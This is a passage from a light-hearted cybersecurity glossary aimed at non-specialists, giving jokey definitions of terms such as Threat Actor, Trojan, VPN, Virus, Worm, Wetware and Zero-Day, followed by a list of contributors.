See Two factor authentication, however it’s typically the way to check that you are who you say you are by the company or website (bank, Amazon, etc.) sending a code to the phone THEY think you have (or you told them that you own). We talk a lot about multi-factor authentication being something you know, you are, or you own (pick two). So many times your phone becomes part of that equation. It’s certainly NOT the most secure way to do two factors, but for many, it’s the most convenient.
It’s better than JUST a password, but only just…
Threat
Something that is likely to cause damage, harm, injury, OR a lot of paperwork for the lawyers and insurance folks… In our digital world, the concept of a threat is often attributed to a way into a company, their systems, software, databases, or something else that could be used to harm them (or others around them). We tend to talk about threats and how to reduce them, mitigate them, manage them, and deal with them. The challenge as we ALL know is that threats are all around us, and over our evolution, we’ve worked out how to manage them, mitigate them, and accept some of them. The digital world has come at us faster than many can adapt to and therefore the threats are often misunderstood, misinterpreted, OR quite simply ignored until too late.
Everything’s a threat, it’s simply a matter of HOW we deal with it…
Threat Actor
This is the human portion of the “threat” we’ve talked about elsewhere in this compendium. This is the individual (or group thereof) that is the catalyst for the threat becoming a reality. This is where we go from the potential to the “where’s the Incident Response book?” You can consider the threat actor to also wear many hats: the criminal, organized crime, hacktivist, spy, insider threat, or the unintentional “whoops” moment you experience when something happened that you just didn’t expect, anticipate, OR thought wouldn’t happen (because, let’s face it, digital crime ONLY ever happens to someone else…). I’ve left OUT state sponsored or advanced threat actors because despite the media and Hollywood’s otherwise desire to see us all breached by China, Russia, Germany, NZ, or NK, the simple fact is, many of us aren’t interesting enough for them. So, welcome to the threat actor, the bag of squishy bits that sits between the keyboard and chair.
The human in the digital world.
Threat Intelligence Platform
Community Submission from Rachel Arnold:
We have a lot of friends with a lot of good vulnerability gossip that we just CANNOT wait to feed to YOU!
Transport Layer Security (TLS)
See Secure Socket Layer (SSL) but with added whoomph, handshakes, and mathematical subterfuge...
Turbo digital carrier pigeon with a much bigger padlock!
Trojan (or Trojan Horse)
The Greeks are going to have to take the blame for the name, because, if we believe the fables around 3200 years ago, they very nicely left a parting gift for their foes (a horse) which was taken into the city and subsequently (much to the surprise of the folks who brought it INTO the city) was found to contain a squadron of warm, annoyed, and very much alive, armed enemies… Now, anyone that brings a heavy horse that seems to be breathing INTO a city they’ve been defending for years deserves to lose the fight. Best set fire to the darn thing outside the gate next time! However, in our digital world, hiding an attacking program inside a nice looking document, image, or file is the equivalent of what the Greeks did. SO, the next time someone tries to send you one of those Internet Cat memes, DON’T download it and go around to their house and set fire to their computer.
Beware of Geeks bearing gifts…
Troll
As in fantasy, so in digital… In the fantasy world, a troll is a mythical cave dwelling being (or under the bridge for a change of scenery) depicted in folklore as rarely helpful towards humans (or goats). In the digital world, it’s almost the same. They are often intentionally inflammatory, aiming to upset or provoke their targets into an emotional response. As in the fantasy world, the general sentiment across the Internet is that the digital troll also needs to be thrown off the bridge into the gorge below.
Don't feed the trolls.
User
That’d be you, I, and about 4.5 billion of our closest friends on the Internet. We are all users OF the very systems we carry with us, access, and have integrated into our lives. In business speak, we often refer to end-users as those being the consumers OF the services that the IT teams have deployed. They are target users, and the very ones the entire InfoSec/Cyber world should be focused on better defending. They are our charges.
The first AND most important line of defense
Virtual Private Network (VPN)
It’s the digital equivalent of having your OWN lane on the crowded highway, with your own security escort, knowing full well no pesky oiks or common folks are going to get in your way…. You have to use the same roads as everyone else (the Internet) yet you have your own lane everywhere you go that protects you from the uncouth rabble around you. Welcome to a “virtual” private network, it looks, smells, tastes, and feels the same as the real thing yet it’s overlaid on top JUST for you…
Your own Digital HOV lane…
Virus
A little history...Computer viruses have been around for the last 50 years…the first one targeted the DEC systems linked to the fledgling thing we now call the Internet (ARPANET). For a while, it was fairly quiet. Then, in 1986 and 1988, we had Brain and The Morris, two programs that spread (like a traditional human virus) to infect computers through various security holes or communication protocols. (Worth noting that The Morris infected (accidentally) around 15,000 computers which back in the 80’s was about the sum total OF the Internet.) Basically, take the same thing a biological virus does and bring it into the digital world…. Infect something, copy oneself, and then look for new hosts.
As in reality, so in digital…
Wetware
Welcome to you, yourself, and your place in the digital realm. You, the breathing bag of skin, water, and squishy bits. You are the wetware, the thing sitting between the keyboard and the chair. When we talk about a wetware attack, we’re talking about how to circumvent you, how to manipulate you, or “encourage” you to do something you’d not ordinarily do. (like lend money to a total stranger just because they’ve got their own bank in Kenya).
There ARE wetware computers, interfaces, and systems. These typically are bio implants, software designed to interface with neurons or other systems (muscles, etc.) and other interface architectures that allow a human to work more closely or directly with the digital world around them.
The organic bit between the keyboard and chair
White Hat
See Black Hat. This is the other end of that spectrum and also needs to be learned from and never used in the context of IT/InfoSec/Cyber ever again.
There are NO hats.
Wikipedia
It’s a living, breathing digital Encyclopedia Britannica for everything we think we know, compiled by everyone on the planet, curated by volunteer editors, and designed to answer as much as it can about anything IN the known universe. It is one of the (if not THE) largest general reference works on the Internet.
Community brain trust
Won the Lottery
No, you didn’t win, neither did you come in second, or get another bite of the apple, and even if (by some fluke) you DID win, do you really think they’d ask you to either prove who you are OR ask you to pay THEM money for the money they owe you? No. Never. It’s NOT how it works. So, don’t hand over your identity or your money. EVER. Please.
Worm
A more independent and intelligent virus. (See Virus) Think of it as the teenager that’s grown up a bit, has gone out into the world on their own, and is exploring around. There’s no need (or little need) for interaction by the host… They just get on with things and wander round. They’re not attached anymore, they like their own company, and can be fairly independent. They’ve NOT worked out how to grow up more or adapt, but they’re still bloody annoying…. just LIKE teenagers. (polymorphic)
Sneaky virus with independence and intelligence
Zero-Day
The cynic in me wants to tell you it’s a marketing term or buzzword that’s used to incite panic, fear, and uncertainty into the population to get them to buy more stuff to make them feel safer and protected. However, that aside, there IS a logical explanation for what a 0-Day, or zero-day is, and it’s simply the fact that some enterprising individual, team, or nation state found a flaw in the system that wasn’t discovered during the design, build, testing, or QA process. It’s like stumbling upon that hidden room that nobody knows about by twisting the chandelier 90 degrees… The owner goes, “Damn, didn’t know about that.” The designer goes, “Hmmmm, that’s new…" The testing team wants to talk with you about HOW you planned that AND you’re sitting there with the keys to the kingdom that nobody knows about. The question then is, what ARE you going to do?
Didn’t see that one coming….Undocumented features
LinkedIn folks who have helped with some of this:
- Paul DeAngelis - Data analyst, data modeler, and systems analyst with experience in Insurance and Pharmaceutical Safety
- Gary Hayslip - Chief Information Security Officer at SoftBank Investment Advisers "Vision Fund" | Board Advisor | Author | Mentor | Servant Leader
- Benjamin Corll - Passionate about all things concerning cyber security & data protection
- Mara Calvello - Senior Content Marketing Specialist at G2
- Jennifer Barg - Project Manager and Squirrel Hunter at HillBilly Hit Squad
- Jakob Nelson - Penetration Tester, Intel Analyst, and Undergeek in residence at HillBilly Hit Squad
Sources for some of the inspiration: